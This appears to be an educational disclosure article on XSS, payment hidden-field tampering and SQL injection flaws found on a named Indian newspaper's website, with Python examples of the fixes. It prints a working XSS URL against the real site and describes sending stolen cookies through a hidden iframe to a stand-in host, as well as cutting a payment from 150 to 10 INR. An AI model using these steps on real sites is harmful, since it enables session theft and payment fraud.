Disclaimer: This article carries information about the security vulnerabilities in a leading website. I’m not responsible if anyone tries to exploit these vulnerabilities. This article is written for educational purposes, and exploiting such vulnerabilities may invite legal charges levelled against you. I have already reported the vulnerabilities to the web team. But I have not checked whether they have fixed the issues.
E-commerce is a part of our daily life. I have shared my credit card information with many leading internet service providers like Google, Amazon, Paypal and so on. But can we trust a website simply because it is very popular? It seems that would be a bad idea.
Websites like Google and Amazon are internet giants! So they know about the platform and the architecture. Hence, while designing a new service, they will always look at the associated security issues. Though there were security loopholes reported in the case of popular websites like Facebook and MySpace, they responded immediately and fixed the issues.
But what about other popular websites whose primary business is not linked to the Internet? Let’s take the case of the websites of leading newspapers. In my personal opinion, they adopt one of two ways. In the first case, they create a ‘web team that includes people from the editorial team of the paper’, and the other way is to create a kind of ‘support team’ that performs all the internet-related activities. The first one is preferable as it is more secure because of its autonomous status.
Let’s perform some basic testing on one of the popular websites based in India – thehindu.com (the website of The Hindu, a national newspaper).
Vulnerable to XSS attack
It is found that thehindu.com is vulnerable to XSS attacks. Consider the following example to see the vulnerability in the code:
If someone sends an email with the following content:
Check out this story (+ some blah-blah about the story) in The Hindu:
http://epaper.thehindu.com/svww_searchresult.php?keyword=%3Cscript%20type=%22text/javascript%22%3E%20alert%20%28%27Poor%20coding!%27%29;%20%3C/script%3E
It is likely that people will click on that link since the domain is thehindu.com. If the users have already logged into the E-paper site, then this is what they will be seeing:
This illustrates the vulnerability. The above URL had a script that simply creates an alert box. You can manipulate the URL further by obfuscating it. One can exploit this by changing the code to read the cookie information via document.cookie. Then he can open an iframe of 0 width and connect to
anothersite.com/userdetails?cookie=var
and pass the cookie information. This means that the attacker can now use the account (actually, ‘the session’) of the legitimate user. This can also be used for creating a frame that collects the actual login details from the user, so the attacker can steal that information as well. People won’t suspect anything as it is displayed at a thehindu.com URL.
This vulnerability can also be exploited for defacing the site and attacking its reputation. If this issue is fixed, then one cannot perform such malicious activities (as shown below).
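To show what the fix for the search page looks like, here is an added example (my own Python, not the site's PHP or anything from this post): the raw-reflection pattern beside an HTML-encoded version. The hostname and the sample URL are constructed stand-ins for the link above.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the search-result link discussed above (not the live site).
SAMPLE_URL = ("http://search.example/svww_searchresult.php?keyword="
              "%3Cscript%3Ealert%28%27Poor%20coding%21%27%29%3B%3C%2Fscript%3E")


def keyword_from_url(url: str) -> str:
    """Return the percent-decoded 'keyword' query parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get("keyword", [""])[0]


def render_results_unsafe(keyword: str) -> str:
    """The pattern behind reflected XSS: the parameter is pasted straight into
    the page, so any tags it carries become part of the DOM and run."""
    return f"<h2>Results for {keyword}</h2>"


def render_results_safe(keyword: str) -> str:
    """Hardened version: HTML-encode the parameter before reflecting it.
    quote=True also encodes ' and ", which matters inside attribute values."""
    return f"<h2>Results for {html.escape(keyword, quote=True)}</h2>"


def contains_live_script(page: str) -> bool:
    """Cheap regression check for a test suite: an unencoded <script tag in
    the rendered page means user input reached the markup unescaped."""
    return "<script" in page.lower()


if __name__ == "__main__":
    kw = keyword_from_url(SAMPLE_URL)
    print("unsafe :", render_results_unsafe(kw))
    print("safe   :", render_results_safe(kw))
```

Encoding has to match the output context; html.escape is right for text and attribute values, while a parameter echoed inside a script block or a URL needs JavaScript or URL encoding instead.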
Manipulating Financial Details
The website handles the initiation of the collection of financial details in a highly insecure way. This attack is more serious from a financial point of view.
As you can see here, the site is using hidden fields for sending the values. But it is easy to capture this header information and edit it.
Here, as an example, I’m editing the value 150 INR to just 10 INR, and you can see that I am able to make the payment for that amount. And the ‘transaction id’ remains the same, so one can use the service by paying less money!
Since the origin of the request is hindu.com, I don’t think that The Hindu can nullify the transaction or call it invalid because of the non-repudiation elements involved in the transaction.
I wonder what will happen if one performs a transaction for ‘–1 million’!
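As an added illustration (my own Python, not the site's code), here is how the server side should treat that hidden amount field: look the price up from server-side data and refuse anything that differs, including the negative amount wondered about above. The product name, price table and currency are constructed.

```python
from dataclasses import dataclass
from decimal import Decimal

# Constructed server-side price list. The browser only names the product;
# the price is looked up here, never read back from the form.
CATALOGUE = {"epaper-subscription": Decimal("150.00")}


@dataclass(frozen=True)
class PaymentRequest:
    transaction_id: str
    product: str
    amount: Decimal      # what arrived in the hidden field: treated as untrusted
    currency: str


class PaymentRejected(ValueError):
    """Raised when the posted details do not match what the server expects."""


def authorise(req: PaymentRequest) -> Decimal:
    """Return the amount the gateway may charge for this request.

    Every check is done against server-side data, so editing the hidden
    field (150 -> 10, or a negative number) cannot change what is charged.
    """
    if req.currency != "INR":
        raise PaymentRejected(f"{req.transaction_id}: unexpected currency {req.currency}")
    expected = CATALOGUE.get(req.product)
    if expected is None:
        raise PaymentRejected(f"{req.transaction_id}: unknown product {req.product}")
    if req.amount <= 0:
        raise PaymentRejected(f"{req.transaction_id}: non-positive amount {req.amount}")
    if req.amount != expected:
        raise PaymentRejected(
            f"{req.transaction_id}: posted {req.amount}, catalogue price is {expected}")
    return expected


def is_accepted(req: PaymentRequest) -> bool:
    """Convenience wrapper for logging or tests: True only if authorise() passes."""
    try:
        authorise(req)
        return True
    except PaymentRejected as err:
        print("rejected:", err)   # in production: log and alert, never charge
        return False
```

A mismatch between the posted amount and the catalogue price is worth alerting on, since a browser never produces it on its own.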
SQL Attacks
The site is also vulnerable to some SQL attacks. As you can see here, when I issued an SQL query, I got all the indexed keywords on the site.
The site can also be attacked from the login page itself to get the error codes used by the site (a minor issue):
These are some of the issues that I found when I spent a few minutes on the site. Now imagine a dedicated attacker with more time to spare!
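Added example, not from the site or this post: the string-built query pattern that leads to this, next to the parameterised form, run against a constructed in-memory keyword table. A keyword containing a single quote is enough to show the difference.

```python
import sqlite3


def build_index() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the site's keyword index."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE keywords (word TEXT)")
    conn.executemany("INSERT INTO keywords VALUES (?)",
                     [("budget",), ("cricket",), ("monsoon",), ("O'Brien",)])
    return conn


def search_unsafe(conn: sqlite3.Connection, keyword: str) -> list:
    """String-built query: the keyword becomes part of the SQL text, so a quote
    in the input rewrites the statement instead of being compared as data."""
    sql = f"SELECT word FROM keywords WHERE word = '{keyword}'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, keyword: str) -> list:
    """Parameterised query: the driver binds the keyword as a value, so it can
    only be compared, never interpreted as SQL, whatever characters it holds."""
    sql = "SELECT word FROM keywords WHERE word = ?"
    return [row[0] for row in conn.execute(sql, (keyword,))]


def unsafe_breaks_on(conn: sqlite3.Connection, keyword: str) -> bool:
    """True if the string-built query cannot even parse the input: the same
    symptom behind the database error codes leaking from the login page."""
    try:
        search_unsafe(conn, keyword)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = build_index()
    print(search_safe(db, "O'Brien"))        # ['O'Brien']
    print(unsafe_breaks_on(db, "O'Brien"))   # True
```

Returning a generic error page instead of the driver's message closes the minor issue mentioned above, but only binding parameters closes the injection itself.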
Tips for Users
- DO NOT use the same password (that you use for online banking or accessing your email) on these types of websites
- Always check that the site URL (protocol) starts with https when doing a financial transaction
- Perform the financial transaction only if it is handled by a reliable third-party gateway (say, that of a bank)
Tips for Website owners
- Use bots for tracking unusual activities
- Always have a dedicated web team
- Use frameworks for delivering the content
- Perform basic security checks before launching it!
- Use Google custom search for searching the pages